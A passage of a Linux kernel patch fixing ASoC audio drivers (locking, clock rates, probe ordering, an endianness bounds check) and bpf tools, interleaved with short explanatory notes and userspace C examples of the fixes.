++	if (dev->trigger_enabled) {
++		regmap_read(dev->regmap, SPDIFRX_RSR, &val);
++		/* If the receiver is not locked, IFS data is invalid. */
++		if (val & SPDIFRX_RSR_ULOCK || !(val & SPDIFRX_RSR_IFS_MASK)) {
++			ucontrol->value.integer.value[0] = 0;
++			goto unlock;
++		}
++	} else {
++		/* Receiver is not locked, IFS data is invalid. */
+ 		ucontrol->value.integer.value[0] = 0;
+-		return 0;
++		goto unlock;
+ 	}
+ 
+ 	rate = clk_get_rate(dev->gclk);
+ 
+ 	ucontrol->value.integer.value[0] = rate / (32 * SPDIFRX_RSR_IFS(val));
+ 
++unlock:
++	mutex_unlock(&dev->mlock);
+ 	return 0;
+ }
+ 
+@@ -808,11 +904,9 @@ static int mchp_spdifrx_dai_probe(struct snd_soc_dai *dai)
+ 		     SPDIFRX_MR_AUTORST_NOACTION |
+ 		     SPDIFRX_MR_PACK_DISABLED);
+ 
+-	dev->blockend_refcount = 0;
+ 	for (ch = 0; ch < SPDIFRX_CHANNELS; ch++) {
+ 		init_completion(&ctrl->ch_stat[ch].done);
+ 		init_completion(&ctrl->user_data[ch].done);
+-		spin_lock_init(&ctrl->user_data[ch].lock);
+ 	}
+ 
+ 	/* Add controls */
+@@ -827,7 +921,7 @@ static int mchp_spdifrx_dai_remove(struct snd_soc_dai *dai)
+ 	struct mchp_spdifrx_dev *dev = snd_soc_dai_get_drvdata(dai);
+ 
+ 	/* Disable interrupts */
+-	regmap_write(dev->regmap, SPDIFRX_IDR, 0xFF);
++	regmap_write(dev->regmap, SPDIFRX_IDR, GENMASK(14, 0));
+ 
+ 	clk_disable_unprepare(dev->pclk);
+ 
+@@ -913,7 +1007,17 @@ static int mchp_spdifrx_probe(struct platform_device *pdev)
+ 			"failed to get the PMC generated clock: %d\n", err);
+ 		return err;
+ 	}
+-	spin_lock_init(&dev->blockend_lock);
++
++	/*
++	 * Signal control needs a valid rate on gclk. hw_params() configures
++	 * it properly, but requesting the signal before any hw_params() has
++	 * been called leads to an invalid signal value being returned. Thus,
++	 * configure gclk at a valid rate here at initialization to simplify
++	 * the control path.
++	 */
++	clk_set_min_rate(dev->gclk, 48000 * SPDIFRX_GCLK_RATIO_MIN + 1);
++
++	mutex_init(&dev->mlock);
+ 
+ 	dev->dev = &pdev->dev;
+ 	dev->regmap = regmap;
+diff --git a/sound/soc/codecs/lpass-rx-macro.c b/sound/soc/codecs/lpass-rx-macro.c
+index a9ef9d5ffcc5c..8621cfabcf5b6 100644
+--- a/sound/soc/codecs/lpass-rx-macro.c
++++ b/sound/soc/codecs/lpass-rx-macro.c
+@@ -366,7 +366,7 @@
+ #define CDC_RX_DSD1_CFG2			(0x0F8C)
+ #define RX_MAX_OFFSET				(0x0F8C)
+ 
+-#define MCLK_FREQ		9600000
++#define MCLK_FREQ		19200000
+ 
+ #define RX_MACRO_RATES (SNDRV_PCM_RATE_8000 | SNDRV_PCM_RATE_16000 |\
+ 			SNDRV_PCM_RATE_32000 | SNDRV_PCM_RATE_48000 |\
+@@ -3579,7 +3579,7 @@ static int rx_macro_probe(struct platform_device *pdev)
+ 
+ 	/* set MCLK and NPL rates */
+ 	clk_set_rate(rx->mclk, MCLK_FREQ);
+-	clk_set_rate(rx->npl, 2 * MCLK_FREQ);
++	clk_set_rate(rx->npl, MCLK_FREQ);
+ 
+ 	ret = clk_prepare_enable(rx->macro);
+ 	if (ret)
+@@ -3601,10 +3601,6 @@ static int rx_macro_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto err_fsgen;
+ 
+-	ret = rx_macro_register_mclk_output(rx);
+-	if (ret)
+-		goto err_clkout;
+-
+ 	ret = devm_snd_soc_register_component(dev, &rx_macro_component_drv,
+ 					      rx_macro_dai,
+ 					      ARRAY_SIZE(rx_macro_dai));
+@@ -3618,6 +3614,10 @@ static int rx_macro_probe(struct platform_device *pdev)
+ 	pm_runtime_set_active(dev);
+ 	pm_runtime_enable(dev);
+ 
++	ret = rx_macro_register_mclk_output(rx);
++	if (ret)
++		goto err_clkout;
++
+ 	return 0;
+ 
+ err_clkout:
+diff --git a/sound/soc/codecs/lpass-tx-macro.c b/sound/soc/codecs/lpass-tx-macro.c
+index ee15cf6b98bba..5d1c58df081ac 100644
+--- a/sound/soc/codecs/lpass-tx-macro.c
++++ b/sound/soc/codecs/lpass-tx-macro.c
+@@ -202,7 +202,7 @@
+ #define TX_MACRO_AMIC_UNMUTE_DELAY_MS	100
+ #define TX_MACRO_DMIC_HPF_DELAY_MS	300
+ #define TX_MACRO_AMIC_HPF_DELAY_MS	300
+-#define MCLK_FREQ		9600000
++#define MCLK_FREQ		19200000
+ 
+ enum {
+ 	TX_MACRO_AIF_INVALID = 0,
+@@ -1867,7 +1867,7 @@ static int tx_macro_probe(struct platform_device *pdev)
+ 
+ 	/* set MCLK and NPL rates */
+ 	clk_set_rate(tx->mclk, MCLK_FREQ);
+-	clk_set_rate(tx->npl, 2 * MCLK_FREQ);
++	clk_set_rate(tx->npl, MCLK_FREQ);
+ 
+ 	ret = clk_prepare_enable(tx->macro);
+ 	if (ret)
+@@ -1889,10 +1889,6 @@ static int tx_macro_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto err_fsgen;
+ 
+-	ret = tx_macro_register_mclk_output(tx);
+-	if (ret)
+-		goto err_clkout;
+-
+ 	ret = devm_snd_soc_register_component(dev, &tx_macro_component_drv,
+ 					      tx_macro_dai,
+ 					      ARRAY_SIZE(tx_macro_dai));
+@@ -1905,6 +1901,10 @@ static int tx_macro_probe(struct platform_device *pdev)
+ 	pm_runtime_set_active(dev);
+ 	pm_runtime_enable(dev);
+ 
++	ret = tx_macro_register_mclk_output(tx);
++	if (ret)
++		goto err_clkout;
++
+ 	return 0;
+ 
+ err_clkout:
+diff --git a/sound/soc/codecs/lpass-va-macro.c b/sound/soc/codecs/lpass-va-macro.c
+index b0b6cf29cba30..1623ba78ddb3d 100644
+--- a/sound/soc/codecs/lpass-va-macro.c
++++ b/sound/soc/codecs/lpass-va-macro.c
+@@ -1524,16 +1524,6 @@ static int va_macro_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto err_mclk;
+ 
+-	ret = va_macro_register_fsgen_output(va);
+-	if (ret)
+-		goto err_clkout;
+-
+-	va->fsgen = clk_hw_get_clk(&va->hw, "fsgen");
+-	if (IS_ERR(va->fsgen)) {
+-		ret = PTR_ERR(va->fsgen);
+-		goto err_clkout;
+-	}
+-
+ 	if (va->has_swr_master) {
+ 		/* Set default CLK div to 1 */
+ 		regmap_update_bits(va->regmap, CDC_VA_TOP_CSR_SWR_MIC_CTL0,
+@@ -1560,6 +1550,16 @@ static int va_macro_probe(struct platform_device *pdev)
+ 	pm_runtime_set_active(dev);
+ 	pm_runtime_enable(dev);
+ 
++	ret = va_macro_register_fsgen_output(va);
++	if (ret)
++		goto err_clkout;
++
++	va->fsgen = clk_hw_get_clk(&va->hw, "fsgen");
++	if (IS_ERR(va->fsgen)) {
++		ret = PTR_ERR(va->fsgen);
++		goto err_clkout;
++	}
++
+ 	return 0;
+ 
+ err_clkout:
+diff --git a/sound/soc/codecs/lpass-wsa-macro.c b/sound/soc/codecs/lpass-wsa-macro.c
+index 5e0abefe7cced..c012033fb69ed 100644
+--- a/sound/soc/codecs/lpass-wsa-macro.c
++++ b/sound/soc/codecs/lpass-wsa-macro.c
+@@ -2449,11 +2449,6 @@ static int wsa_macro_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto err_fsgen;
+ 
+-	ret = wsa_macro_register_mclk_output(wsa);
+-	if (ret)
+-		goto err_clkout;
+-
+-
+ 	ret = devm_snd_soc_register_component(dev, &wsa_macro_component_drv,
+ 					      wsa_macro_dai,
+ 					      ARRAY_SIZE(wsa_macro_dai));
+@@ -2466,6 +2461,10 @@ static int wsa_macro_probe(struct platform_device *pdev)
+ 	pm_runtime_set_active(dev);
+ 	pm_runtime_enable(dev);
+ 
++	ret = wsa_macro_register_mclk_output(wsa);
++	if (ret)
++		goto err_clkout;
++
+ 	return 0;
+ 
+ err_clkout:
+diff --git a/sound/soc/codecs/tlv320adcx140.c b/sound/soc/codecs/tlv320adcx140.c
+index 91a22d9279158..530f321d08e9c 100644
+--- a/sound/soc/codecs/tlv320adcx140.c
++++ b/sound/soc/codecs/tlv320adcx140.c
+@@ -925,7 +925,7 @@ static int adcx140_configure_gpio(struct adcx140_priv *adcx140)
+ 
+ 	gpio_count = device_property_count_u32(adcx140->dev,
+ 			"ti,gpio-config");
+-	if (gpio_count == 0)
++	if (gpio_count <= 0)
+ 		return 0;
+ 
+ 	if (gpio_count != ADCX140_NUM_GPIO_CFGS)
+diff --git a/sound/soc/fsl/fsl_sai.c b/sound/soc/fsl/fsl_sai.c
+index 8205b32171495..df7c0bf372451 100644
+--- a/sound/soc/fsl/fsl_sai.c
++++ b/sound/soc/fsl/fsl_sai.c
+@@ -281,6 +281,7 @@ static int fsl_sai_set_dai_fmt_tr(struct snd_soc_dai *cpu_dai,
+ 		val_cr4 |= FSL_SAI_CR4_MF;
+ 
+ 	sai->is_pdm_mode = false;
++	sai->is_dsp_mode = false;
+ 	/* DAI mode */
+ 	switch (fmt & SND_SOC_DAIFMT_FORMAT_MASK) {
+ 	case SND_SOC_DAIFMT_I2S:
+diff --git a/sound/soc/kirkwood/kirkwood-dma.c b/sound/soc/kirkwood/kirkwood-dma.c
+index 700a18561a940..640cebd2983e2 100644
+--- a/sound/soc/kirkwood/kirkwood-dma.c
++++ b/sound/soc/kirkwood/kirkwood-dma.c
+@@ -86,7 +86,7 @@ kirkwood_dma_conf_mbus_windows(void __iomem *base, int win,
+ 
+ 	/* try to find matching cs for current dma address */
+ 	for (i = 0; i < dram->num_cs; i++) {
+-		const struct mbus_dram_window *cs = dram->cs + i;
++		const struct mbus_dram_window *cs = &dram->cs[i];
+ 		if ((cs->base & 0xffff0000) < (dma & 0xffff0000)) {
+ 			writel(cs->base & 0xffff0000,
+ 				base + KIRKWOOD_AUDIO_WIN_BASE_REG(win));
+diff --git a/sound/soc/qcom/qdsp6/q6apm-dai.c b/sound/soc/qcom/qdsp6/q6apm-dai.c
+index ee59ef36b85a6..7f02f5b2c33fd 100644
+--- a/sound/soc/qcom/qdsp6/q6apm-dai.c
++++ b/sound/soc/qcom/qdsp6/q6apm-dai.c
+@@ -8,6 +8,7 @@
+ #include <linux/slab.h>
+ #include <sound/soc.h>
+ #include <sound/soc-dapm.h>
++#include <linux/spinlock.h>
+ #include <sound/pcm.h>
+ #include <asm/dma.h>
+ #include <linux/dma-mapping.h>
+@@ -53,6 +54,7 @@ struct q6apm_dai_rtd {
+ 	uint16_t session_id;
+ 	enum stream_state state;
+ 	struct q6apm_graph *graph;
++	spinlock_t lock;
+ };
+ 
+ struct q6apm_dai_data {
+@@ -62,7 +64,8 @@ struct q6apm_dai_data {
+ static struct snd_pcm_hardware q6apm_dai_hardware_capture = {
+ 	.info =                 (SNDRV_PCM_INFO_MMAP | SNDRV_PCM_INFO_BLOCK_TRANSFER |
+ 				 SNDRV_PCM_INFO_MMAP_VALID | SNDRV_PCM_INFO_INTERLEAVED |
+-				 SNDRV_PCM_INFO_PAUSE | SNDRV_PCM_INFO_RESUME),
++				 SNDRV_PCM_INFO_PAUSE | SNDRV_PCM_INFO_RESUME |
++				 SNDRV_PCM_INFO_BATCH),
+ 	.formats =              (SNDRV_PCM_FMTBIT_S16_LE | SNDRV_PCM_FMTBIT_S24_LE),
+ 	.rates =                SNDRV_PCM_RATE_8000_48000,
+ 	.rate_min =             8000,
+@@ -80,7 +83,8 @@ static struct snd_pcm_hardware q6apm_dai_hardware_capture = {
+ static struct snd_pcm_hardware q6apm_dai_hardware_playback = {
+ 	.info =                 (SNDRV_PCM_INFO_MMAP | SNDRV_PCM_INFO_BLOCK_TRANSFER |
+ 				 SNDRV_PCM_INFO_MMAP_VALID | SNDRV_PCM_INFO_INTERLEAVED |
+-				 SNDRV_PCM_INFO_PAUSE | SNDRV_PCM_INFO_RESUME),
++				 SNDRV_PCM_INFO_PAUSE | SNDRV_PCM_INFO_RESUME |
++				 SNDRV_PCM_INFO_BATCH),
+ 	.formats =              (SNDRV_PCM_FMTBIT_S16_LE | SNDRV_PCM_FMTBIT_S24_LE),
+ 	.rates =                SNDRV_PCM_RATE_8000_192000,
+ 	.rate_min =             8000,
+@@ -99,20 +103,25 @@ static void event_handler(uint32_t opcode, uint32_t token, uint32_t *payload, vo
+ {
+ 	struct q6apm_dai_rtd *prtd = priv;
+ 	struct snd_pcm_substream *substream = prtd->substream;
++	unsigned long flags;
+ 
+ 	switch (opcode) {
+ 	case APM_CLIENT_EVENT_CMD_EOS_DONE:
+ 		prtd->state = Q6APM_STREAM_STOPPED;
+ 		break;
+ 	case APM_CLIENT_EVENT_DATA_WRITE_DONE:
++	        spin_lock_irqsave(&prtd->lock, flags);
+ 		prtd->pos += prtd->pcm_count;
++		spin_unlock_irqrestore(&prtd->lock, flags);
+ 		snd_pcm_period_elapsed(substream);
+ 		if (prtd->state == Q6APM_STREAM_RUNNING)
+ 			q6apm_write_async(prtd->graph, prtd->pcm_count, 0, 0, 0);
+ 
+ 		break;
+ 	case APM_CLIENT_EVENT_DATA_READ_DONE:
++	        spin_lock_irqsave(&prtd->lock, flags);
+ 		prtd->pos += prtd->pcm_count;
++		spin_unlock_irqrestore(&prtd->lock, flags);
+ 		snd_pcm_period_elapsed(substream);
+ 		if (prtd->state == Q6APM_STREAM_RUNNING)
+ 			q6apm_read(prtd->graph);
+@@ -253,6 +262,7 @@ static int q6apm_dai_open(struct snd_soc_component *component,
+ 	if (prtd == NULL)
+ 		return -ENOMEM;
+ 
++	spin_lock_init(&prtd->lock);
+ 	prtd->substream = substream;
+ 	prtd->graph = q6apm_graph_open(dev, (q6apm_cb)event_handler, prtd, graph_id);
+ 	if (IS_ERR(prtd->graph)) {
+@@ -332,11 +342,17 @@ static snd_pcm_uframes_t q6apm_dai_pointer(struct snd_soc_component *component,
+ {
+ 	struct snd_pcm_runtime *runtime = substream->runtime;
+ 	struct q6apm_dai_rtd *prtd = runtime->private_data;
++	snd_pcm_uframes_t ptr;
++	unsigned long flags;
+ 
++	spin_lock_irqsave(&prtd->lock, flags);
+ 	if (prtd->pos == prtd->pcm_size)
+ 		prtd->pos = 0;
+ 
+-	return bytes_to_frames(runtime, prtd->pos);
++	ptr =  bytes_to_frames(runtime, prtd->pos);
++	spin_unlock_irqrestore(&prtd->lock, flags);
++
++	return ptr;
+ }
+ 
+ static int q6apm_dai_hw_params(struct snd_soc_component *component,
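The q6apm-dai change serializes every access to prtd->pos with a spinlock, because the DSP event handler and the ALSA .pointer callback can race on it. Below is a rough userspace analogue of the pattern using pthreads; all names are illustrative, and the kernel driver uses spin_lock_irqsave() instead because its writer runs from interrupt context.

#include <pthread.h>
#include <stdio.h>

/* Shared stream position, analogous to prtd->pos in the driver. */
static size_t pos, pcm_size = 65536, pcm_count = 4096;
static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;

/* Writer: advances the position, like the DATA_WRITE_DONE event. */
static void *producer(void *arg)
{
	(void)arg;
	for (int i = 0; i < 16; i++) {
		pthread_mutex_lock(&lock);
		pos += pcm_count;
		pthread_mutex_unlock(&lock);
	}
	return NULL;
}

/* Reader: samples the position under the same lock, like the .pointer
 * callback, so the wrap-around check and the read are one atomic step. */
static size_t read_pointer(void)
{
	size_t p;

	pthread_mutex_lock(&lock);
	if (pos == pcm_size)
		pos = 0;
	p = pos;
	pthread_mutex_unlock(&lock);
	return p;
}

int main(void)
{
	pthread_t t;

	pthread_create(&t, NULL, producer, NULL);
	printf("in flight: %zu\n", read_pointer());
	pthread_join(&t, NULL);
	printf("after join: %zu\n", read_pointer());	/* wraps to 0 */
	return 0;
}

Build with -pthread; the point is only that the wrap-around check and the read happen atomically with respect to the producer.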
+diff --git a/sound/soc/qcom/qdsp6/q6apm-lpass-dais.c b/sound/soc/qcom/qdsp6/q6apm-lpass-dais.c
+index ce9e5646d8f3a..23d23bc6fbaa7 100644
+--- a/sound/soc/qcom/qdsp6/q6apm-lpass-dais.c
++++ b/sound/soc/qcom/qdsp6/q6apm-lpass-dais.c
+@@ -127,6 +127,11 @@ static int q6apm_lpass_dai_prepare(struct snd_pcm_substream *substream, struct s
+ 	int graph_id = dai->id;
+ 	int rc;
+ 
++	if (dai_data->is_port_started[dai->id]) {
++		q6apm_graph_stop(dai_data->graph[dai->id]);
++		dai_data->is_port_started[dai->id] = false;
++	}
++
+ 	/**
+ 	 * It is recommend to load DSP with source graph first and then sink
+ 	 * graph, so sequence for playback and capture will be different
+diff --git a/sound/soc/sh/rcar/rsnd.h b/sound/soc/sh/rcar/rsnd.h
+index d9cd190d7e198..f8ef6836ef84e 100644
+--- a/sound/soc/sh/rcar/rsnd.h
++++ b/sound/soc/sh/rcar/rsnd.h
+@@ -901,8 +901,6 @@ void rsnd_mod_make_sure(struct rsnd_mod *mod, enum rsnd_mod_type type);
+ 	if (!IS_BUILTIN(RSND_DEBUG_NO_DAI_CALL))	\
+ 		dev_dbg(dev, param)
+ 
+-#endif
+-
+ #ifdef CONFIG_DEBUG_FS
+ int rsnd_debugfs_probe(struct snd_soc_component *component);
+ void rsnd_debugfs_reg_show(struct seq_file *m, phys_addr_t _addr,
+@@ -913,3 +911,5 @@ void rsnd_debugfs_mod_reg_show(struct seq_file *m, struct rsnd_mod *mod,
+ #else
+ #define rsnd_debugfs_probe  NULL
+ #endif
++
++#endif /* RSND_H */
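The rsnd.h hunk relocates the final #endif so the CONFIG_DEBUG_FS declarations sit inside the header guard; before the fix the guard closed early and the trailing block was reprocessed on every inclusion. A minimal sketch of the intended layout, with placeholder names:

/* example.h: everything, including the optional section, stays inside
 * the include guard so repeated inclusion is harmless. */
#ifndef EXAMPLE_H
#define EXAMPLE_H

void always_available(void);

#ifdef CONFIG_DEBUG_FS
int debugfs_probe(void);
#else
#define debugfs_probe NULL
#endif

#endif /* EXAMPLE_H */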
+diff --git a/sound/soc/soc-compress.c b/sound/soc/soc-compress.c
+index 870f13e1d389c..e7aa6f360cabe 100644
+--- a/sound/soc/soc-compress.c
++++ b/sound/soc/soc-compress.c
+@@ -149,6 +149,8 @@ static int soc_compr_open_fe(struct snd_compr_stream *cstream)
+ 	if (ret < 0)
+ 		goto be_err;
+ 
++	mutex_lock_nested(&fe->card->pcm_mutex, fe->card->pcm_subclass);
++
+ 	/* calculate valid and active FE <-> BE dpcms */
+ 	dpcm_process_paths(fe, stream, &list, 1);
+ 	fe->dpcm[stream].runtime = fe_substream->runtime;
+@@ -184,7 +186,6 @@ static int soc_compr_open_fe(struct snd_compr_stream *cstream)
+ 	fe->dpcm[stream].state = SND_SOC_DPCM_STATE_OPEN;
+ 	fe->dpcm[stream].runtime_update = SND_SOC_DPCM_UPDATE_NO;
+ 
+-	mutex_lock_nested(&fe->card->pcm_mutex, fe->card->pcm_subclass);
+ 	snd_soc_runtime_activate(fe, stream);
+ 	mutex_unlock(&fe->card->pcm_mutex);
+ 
+@@ -215,7 +216,6 @@ static int soc_compr_free_fe(struct snd_compr_stream *cstream)
+ 
+ 	mutex_lock_nested(&fe->card->pcm_mutex, fe->card->pcm_subclass);
+ 	snd_soc_runtime_deactivate(fe, stream);
+-	mutex_unlock(&fe->card->pcm_mutex);
+ 
+ 	fe->dpcm[stream].runtime_update = SND_SOC_DPCM_UPDATE_FE;
+ 
+@@ -234,6 +234,8 @@ static int soc_compr_free_fe(struct snd_compr_stream *cstream)
+ 
+ 	dpcm_be_disconnect(fe, stream);
+ 
++	mutex_unlock(&fe->card->pcm_mutex);
++
+ 	fe->dpcm[stream].runtime = NULL;
+ 
+ 	snd_soc_link_compr_shutdown(cstream, 0);
+@@ -409,8 +411,9 @@ static int soc_compr_set_params_fe(struct snd_compr_stream *cstream,
+ 	ret = snd_soc_link_compr_set_params(cstream);
+ 	if (ret < 0)
+ 		goto out;
+-
++	mutex_lock_nested(&fe->card->pcm_mutex, fe->card->pcm_subclass);
+ 	dpcm_dapm_stream_event(fe, stream, SND_SOC_DAPM_STREAM_START);
++	mutex_unlock(&fe->card->pcm_mutex);
+ 	fe->dpcm[stream].state = SND_SOC_DPCM_STATE_PREPARE;
+ 
+ out:
+@@ -623,7 +626,7 @@ int snd_soc_new_compress(struct snd_soc_pcm_runtime *rtd, int num)
+ 		rtd->fe_compr = 1;
+ 		if (rtd->dai_link->dpcm_playback)
+ 			be_pcm->streams[SNDRV_PCM_STREAM_PLAYBACK].substream->private_data = rtd;
+-		else if (rtd->dai_link->dpcm_capture)
++		if (rtd->dai_link->dpcm_capture)
+ 			be_pcm->streams[SNDRV_PCM_STREAM_CAPTURE].substream->private_data = rtd;
+ 		memcpy(compr->ops, &soc_compr_dyn_ops, sizeof(soc_compr_dyn_ops));
+ 	} else {
+diff --git a/sound/soc/soc-topology.c b/sound/soc/soc-topology.c
+index a79a2fb260b87..d68c48555a7e3 100644
+--- a/sound/soc/soc-topology.c
++++ b/sound/soc/soc-topology.c
+@@ -2408,7 +2408,7 @@ static int soc_valid_header(struct soc_tplg *tplg,
+ 		return -EINVAL;
+ 	}
+ 
+-	if (soc_tplg_get_hdr_offset(tplg) + hdr->payload_size >= tplg->fw->size) {
++	if (soc_tplg_get_hdr_offset(tplg) + le32_to_cpu(hdr->payload_size) >= tplg->fw->size) {
+ 		dev_err(tplg->dev,
+ 			"ASoC: invalid header of type %d at offset %ld payload_size %d\n",
+ 			le32_to_cpu(hdr->type), soc_tplg_get_hdr_offset(tplg),
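The soc-topology fix converts payload_size from its on-disk little-endian encoding before doing arithmetic on it; without le32_to_cpu() the bounds check reads a byte-swapped value on big-endian hosts. A portable userspace illustration of the conversion (not the kernel's implementation; the sizes are made up):

#include <stdint.h>
#include <stdio.h>

/* Decode a 4-byte little-endian field regardless of host endianness. */
static uint32_t le32_to_host(const uint8_t b[4])
{
	return (uint32_t)b[0] | (uint32_t)b[1] << 8 |
	       (uint32_t)b[2] << 16 | (uint32_t)b[3] << 24;
}

int main(void)
{
	uint8_t raw[4] = { 0x10, 0x00, 0x00, 0x00 }; /* LE 16 */
	uint32_t payload_size = le32_to_host(raw);
	uint32_t hdr_offset = 32, fw_size = 64;

	/* The bounds check is only meaningful after conversion. */
	if (hdr_offset + payload_size >= fw_size)
		printf("invalid header\n");
	else
		printf("payload_size=%u ok\n", payload_size);
	return 0;
}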
+diff --git a/tools/bootconfig/scripts/ftrace2bconf.sh b/tools/bootconfig/scripts/ftrace2bconf.sh
+index 6183b36c68466..1603801cf1264 100755
+--- a/tools/bootconfig/scripts/ftrace2bconf.sh
++++ b/tools/bootconfig/scripts/ftrace2bconf.sh
+@@ -93,7 +93,7 @@ referred_vars() {
+ }
+ 
+ event_is_enabled() { # enable-file
+-	test -f $1 & grep -q "1" $1
++	test -f $1 && grep -q "1" $1
+ }
+ 
+ per_event_options() { # event-dir
+diff --git a/tools/bpf/bpftool/Makefile b/tools/bpf/bpftool/Makefile
+index 4a95c017ad4ce..a3794b3416014 100644
+--- a/tools/bpf/bpftool/Makefile
++++ b/tools/bpf/bpftool/Makefile
+@@ -187,7 +187,8 @@ $(OUTPUT)%.bpf.o: skeleton/%.bpf.c $(OUTPUT)vmlinux.h $(LIBBPF_BOOTSTRAP)
+ 		-I$(or $(OUTPUT),.) \
+ 		-I$(srctree)/tools/include/uapi/ \
+ 		-I$(LIBBPF_BOOTSTRAP_INCLUDE) \
+-		-g -O2 -Wall -target bpf -c $< -o $@
++		-g -O2 -Wall -fno-stack-protector \
++		-target bpf -c $< -o $@
+ 	$(Q)$(LLVM_STRIP) -g $@
+ 
+ $(OUTPUT)%.skel.h: $(OUTPUT)%.bpf.o $(BPFTOOL_BOOTSTRAP)
+diff --git a/tools/bpf/bpftool/prog.c b/tools/bpf/bpftool/prog.c
+index c81362a001ba9..41c02b6f6f043 100644
+--- a/tools/bpf/bpftool/prog.c
++++ b/tools/bpf/bpftool/prog.c
+@@ -2166,10 +2166,38 @@ static void profile_close_perf_events(struct profiler_bpf *obj)
+ 	profile_perf_event_cnt = 0;
+ }
+ 
++static int profile_open_perf_event(int mid, int cpu, int map_fd)
++{
++	int pmu_fd;
++
++	pmu_fd = syscall(__NR_perf_event_open, &metrics[mid].attr,
++			 -1 /*pid*/, cpu, -1 /*group_fd*/, 0);
++	if (pmu_fd < 0) {
++		if (errno == ENODEV) {
++			p_info("cpu %d may be offline, skip %s profiling.",
++				cpu, metrics[mid].name);
++			profile_perf_event_cnt++;
++			return 0;
++		}
++		return -1;
++	}
++
++	if (bpf_map_update_elem(map_fd,
++				&profile_perf_event_cnt,
++				&pmu_fd, BPF_ANY) ||
++	    ioctl(pmu_fd, PERF_EVENT_IOC_ENABLE, 0)) {
++		close(pmu_fd);
++		return -1;
++	}
++
++	profile_perf_events[profile_perf_event_cnt++] = pmu_fd;
++	return 0;
++}
++
+ static int profile_open_perf_events(struct profiler_bpf *obj)
+ {
+ 	unsigned int cpu, m;
+-	int map_fd, pmu_fd;
++	int map_fd;
+ 
+ 	profile_perf_events = calloc(
+ 		sizeof(int), obj->rodata->num_cpu * obj->rodata->num_metric);
+@@ -2188,17 +2216,11 @@ static int profile_open_perf_events(struct profiler_bpf *obj)
+ 		if (!metrics[m].selected)
+ 			continue;
+ 		for (cpu = 0; cpu < obj->rodata->num_cpu; cpu++) {
+-			pmu_fd = syscall(__NR_perf_event_open, &metrics[m].attr,
+-					 -1/*pid*/, cpu, -1/*group_fd*/, 0);
+-			if (pmu_fd < 0 ||
+-			    bpf_map_update_elem(map_fd, &profile_perf_event_cnt,
+-						&pmu_fd, BPF_ANY) ||
+-			    ioctl(pmu_fd, PERF_EVENT_IOC_ENABLE, 0)) {
++			if (profile_open_perf_event(m, cpu, map_fd)) {
+ 				p_err("failed to create event %s on cpu %d",
+ 				      metrics[m].name, cpu);
+ 				return -1;
+ 			}
+-			profile_perf_events[profile_perf_event_cnt++] = pmu_fd;
+ 		}
+ 	}
+ 	return 0;
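The bpftool refactor above exists so that one specific perf_event_open() failure, ENODEV for an offline CPU, can be skipped rather than aborting profiling. A hedged sketch of just that skip logic follows; the event attribute is a generic cycles counter rather than bpftool's metrics table, and running it may require perf permissions.

#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/perf_event.h>

/* Open one counter on one CPU; treat an offline CPU as non-fatal. */
static int open_counter_on_cpu(int cpu)
{
	struct perf_event_attr attr;
	int fd;

	memset(&attr, 0, sizeof(attr));
	attr.size = sizeof(attr);
	attr.type = PERF_TYPE_HARDWARE;
	attr.config = PERF_COUNT_HW_CPU_CYCLES;

	fd = syscall(__NR_perf_event_open, &attr, -1 /* pid */, cpu,
		     -1 /* group_fd */, 0);
	if (fd < 0) {
		if (errno == ENODEV) {
			fprintf(stderr, "cpu %d may be offline, skipping\n",
				cpu);
			return 0;	/* skip, not a hard error */
		}
		return -1;		/* real failure */
	}
	return fd;
}

int main(void)
{
	for (int cpu = 0; cpu < 4; cpu++)
		if (open_counter_on_cpu(cpu) < 0)
			perror("perf_event_open");
	return 0;
}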
+diff --git a/tools/lib/bpf/bpf_tracing.h b/tools/lib/bpf/bpf_tracing.h
+index 2972dc25ff722..9c1b1689068d1 100644
+--- a/tools/lib/bpf/bpf_tracing.h
++++ b/tools/lib/bpf/bpf_tracing.h
+@@ -137,7 +137,7 @@ struct pt_regs___s390 {
+ #define __PT_PARM3_REG gprs[4]
+ #define __PT_PARM4_REG gprs[5]
+ #define __PT_PARM5_REG gprs[6]
+-#define __PT_RET_REG grps[14]
++#define __PT_RET_REG gprs[14]
+ #define __PT_FP_REG gprs[11]	/* Works only with CONFIG_FRAME_POINTER */
+ #define __PT_RC_REG gprs[2]
+ #define __PT_SP_REG gprs[15]
+diff --git a/tools/lib/bpf/btf.c b/tools/lib/bpf/btf.c
+index 675a0df5c840f..8224a797c2da5 100644
+--- a/tools/lib/bpf/btf.c
++++ b/tools/lib/bpf/btf.c
+@@ -688,8 +688,21 @@ int btf__align_of(const struct btf *btf, __u32 id)
+ 			if (align <= 0)
+ 				return libbpf_err(align);
+ 			max_align = max(max_align, align);
++
++			/* if field offset isn't aligned according to field
++			 * type's alignment, then struct must be packed
++			 */
++			if (btf_member_bitfield_size(t, i) == 0 &&
++			    (m->offset % (8 * align)) != 0)
++				return 1;
+ 		}
+ 
++		/* if struct/union size isn't a multiple of its alignment,
++		 * then struct must be packed
++		 */
++		if ((t->size % max_align) != 0)
++			return 1;
++
+ 		return max_align;
+ 	}
+ 	default:
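The btf__align_of() change encodes a simple inference: if any member offset is not a multiple of that member's natural alignment, or the total size is not padded out to the largest member alignment, the struct can only have been declared packed, so alignment 1 is reported. The rule restated over a toy member table (plain C, not real BTF):

#include <stdio.h>

struct member { int align; int bit_offset; };

/* Return the struct's alignment, or 1 if the layout implies packing. */
static int align_of(const struct member *m, int n, int size)
{
	int max_align = 1;

	for (int i = 0; i < n; i++) {
		if (m[i].align > max_align)
			max_align = m[i].align;
		/* Misaligned field: must be packed. */
		if (m[i].bit_offset % (8 * m[i].align) != 0)
			return 1;
	}
	/* Size not a multiple of the max alignment: must be packed. */
	if (size % max_align != 0)
		return 1;
	return max_align;
}

int main(void)
{
	/* struct { char c; int x; } __attribute__((packed)): x at byte 1 */
	struct member packed[] = { { 1, 0 }, { 4, 8 } };
	/* natural layout: x padded out to byte 4, total size 8 */
	struct member natural[] = { { 1, 0 }, { 4, 32 } };

	printf("packed: %d, natural: %d\n",
	       align_of(packed, 2, 5), align_of(natural, 2, 8));
	return 0;
}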
+diff --git a/tools/lib/bpf/nlattr.c b/tools/lib/bpf/nlattr.c
+index 3900d052ed19e..975e265eab3bf 100644
